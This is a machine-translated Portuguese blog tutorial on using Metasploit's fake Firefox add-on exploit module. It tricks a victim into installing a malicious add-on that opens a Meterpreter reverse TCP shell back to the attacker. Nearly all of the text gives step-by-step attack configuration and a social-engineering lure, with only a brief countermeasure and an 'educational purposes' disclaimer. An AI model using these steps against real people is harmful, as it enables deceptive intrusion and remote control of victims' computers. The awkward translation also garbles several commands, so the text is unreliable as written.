- Criar uma extensão do Firefox falso com Metasploit que cria uma backdoor no sistema da vítima.
- Enganam os usuários de instalar o add-on
- Invadir o computador de destino.
- Como de costume, você tem que configurar duas máquinas virutal (VM) no seu virtualbox ou seja, "Destino" e "atacante".
- Instalar o windows xp ou 7 na VM de destino.
- Instale o Backtrack na VM atacante.
Parte I: Atualize o Metasploit
Como estamos indo para usar o mais recente módulo, você são aconselhados a atualizar os módulos do Metasploit. Não sei como fazer isso? Não precisa se preocupar!
- Abra o Terminal
- Tipo msfupdate
- Isto irá atualizar o Metasploit com o mais recente módulos :)
Etapa 1:
Abra o Terminal e "msfconsole" tipo para obter o console Metasploit.
Etapa 2:
Tipo "use exploit / multi / browser / firefox_xpi_bootstrapped_addon" no console.
Etapa 3:
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.
Ao contrário do último tutorial, este módulo tem uma configuração extra para o módulo nomeadamente "addonname".
Passo 4: Configurações
Digite os comandos destacou um por um no console
Comando: definir falso addonname
Detalhes: Nome para o falso add-on. você pode alterar o "fake" para qualquer nome.
Comando: SRVHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Se você tem dificuldade em obter os detalhes de ip, por favor mande seu comentário ou ler meu post anterior.
Comando: set SRVPORT 80
Detalhes: Nosso servidor vai ser acessada através da porta 80 (porta padrão)
Comando: set URIPATH fakeEx
Detalhes: O caminho em que o falso add-on estará disponível para download. Por ex: http://192.168.56.11/fakeEx
Comando: LHOST conjunto 192.168.56.11
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.
Passo 5: Carga
Passo 5: Carga
Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp
Parte III: ataque de engenharia social
Configurado com êxito as configurações para a sua exploração, o que mais?! vamos lançar o exploit.
Digite "proeza" no console.
Agora, o exploit é iniciado. Nosso falso add-on está disponível em "http://192.168.56.11/fakeEx".
Uma vez vítima visitar o link, ele vai pedir usuário para instalar o add-on para visualizar a página. Quando o usuário instalar o add-on, o sistema será backdoor-ed.
Agora, você pode controlar o sistema vítima de Meterpreter.
Contramedidas:
Eu acredito que você entende os riscos de instalar o add-on de fontes desconhecidas. Então, pense duas vezes antes de instalar o add-on. Sempre use confiança extra. Pesquisa no google por comentário sobre o add-on.
Disclaimer:
O artigo dado aqui é o propósito educacional somente. Sugerimos que você tente este método em um ambiente controlado virtualbox. Nós não somos responsáveis por sua atividade ilegal.
Fonte: BTS
0 comentários:
Postar um comentário